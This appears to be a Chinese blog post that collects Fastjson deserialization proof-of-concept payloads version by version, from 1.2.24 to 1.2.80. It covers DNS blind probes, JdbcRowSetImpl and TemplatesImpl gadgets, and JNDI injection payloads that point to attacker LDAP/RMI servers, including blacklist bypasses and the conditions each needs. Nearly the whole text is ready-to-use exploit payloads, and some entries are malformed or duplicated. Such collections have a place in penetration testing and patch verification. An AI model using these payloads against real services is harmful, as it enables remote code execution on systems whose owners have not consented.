Fastjson各个版本poc

Posted Feb 14, 2026

利用DNS盲打

{"aa":{"@type":"java.net.Inet4Address","val":"71p1f9yy.requestrepo.com"}}
{"aa":{"@type":"java.net.Inet6Address","val":"71p1f9yy.requestrepo.com"}}
{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"71p1f9yy.requestrepo.com"}}}

//变换
{{"@type":"java.net.URL","val":"http://71p1f9yy.requestrepo.com"}:"a"}

Fastjson1.2.24

JdbcRowSetImpl反序列化

{
    "@type":"com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName":"ldap://192.168.1.28:1389/enkj9z",
    "autoCommit":true
}

TemplatesImpl 反序列化

{
    "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    "_bytecodes": ["恶意字节码"],
    "_name": "test",
    "_tfactory": {},
    "_outputProperties": {},
}

Fastjson1.2.25

{
  "@type":"[com.sun.rowset.JdbcRowSetImpl;",
  "dataSourceName":"ldap://192.168.1.28:1389/enkj9z",
  "autoCommit":true
}
或
{
  "a":{
    "@type":"LLcom.sun.rowset.JdbcRowSetImpl;;",
    "dataSourceName":"rmi://192.168.1.28:1099/dmjlqc",
    "autoCommit":true
  }
}

Fastjson1.2.42

{
    "@type":"LLcom.sun.rowset.JdbcRowSetImpl;;",
    "dataSourceName":"ldap://192.168.1.28:1389/enkj9z",
    "autoCommit":true
}

Fastjson1.2.43

{
    "@type":"[com.sun.rowset.JdbcRowSetImpl"[,
    {"dataSourceName":"ldap://192.168.1.28:1389/enkj9z",
    "autoCommit":true
}

或
{
    "b":{
        "@type":"[com.sun.rowset.JdbcRowSetImpl"[{,
        "dataSourceName":"rmi://192.168.1.28:1099/dmjlqc",
        "autoCommit":true
    }
}

Fastjson1.2.45

利用条件：

目标服务端存在mybatis的jar包。
版本需为 3.x.x ～ 3.5.0
autoTypeSupport属性为true才能使用。（fastjson >= 1.2.25默认为false）

{
    "@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
    "properties":{
        "data_source":"ldap://192.168.1.28:1389/enkj9z"
    }
}

或
{
    "b":{
        "@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
        "properties":{"data_source":"ldap://192.168.1.28:1389/enkj9z"}
    }
}

Fastjson1.2.47

{
    "aaa": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "bbb": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://192.168.1.28:1389/enkj9z",
        "autoCommit": true
    }
}

或
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.1.28:1099/dmjlqc",
        "autoCommit":true
    }
}

fastjson <=1.2.62 和 <=1.2.66

在该版本中，autoType需要设置为true，同时需要存在org.apache.xbean.propertyeditor.JndiConverter类

可以在代码中直接编写代码设置

也可以在fastjson.properties文件中设置

基于黑名单绕过fastjson <= 1.2.62

{
  "@type":"org.apache.xbean.propertyeditor.JndiConverter",
  "AsText":"rmi://127.0.0.1:1099/exploit"
}";

或
{
  "@type":"org.apache.xbean.propertyeditor.JndiConverter",
  "AsText":"rmi://127.0.0.1:1099/exploit"
}"

或
{
  "@type":"org.apache.xbean.propertyeditor.JndiConverter",
  "AsText":"rmi://127.0.0.1:1099/exploit"
}

或
{{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://192.168.1.28:1389/dmjlqc"}}

基于fastjson<=1.2.66的poc

{
  "@type":"org.apache.shiro.jndi.JndiObjectFactory",
  "resourceName":"ldap://192.168.1.28:1389/dmjlqc"
}

Fastjson1.2.68

Fastjson1.2.80

{{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://192.168.1.28:1389/dmjlqc"}}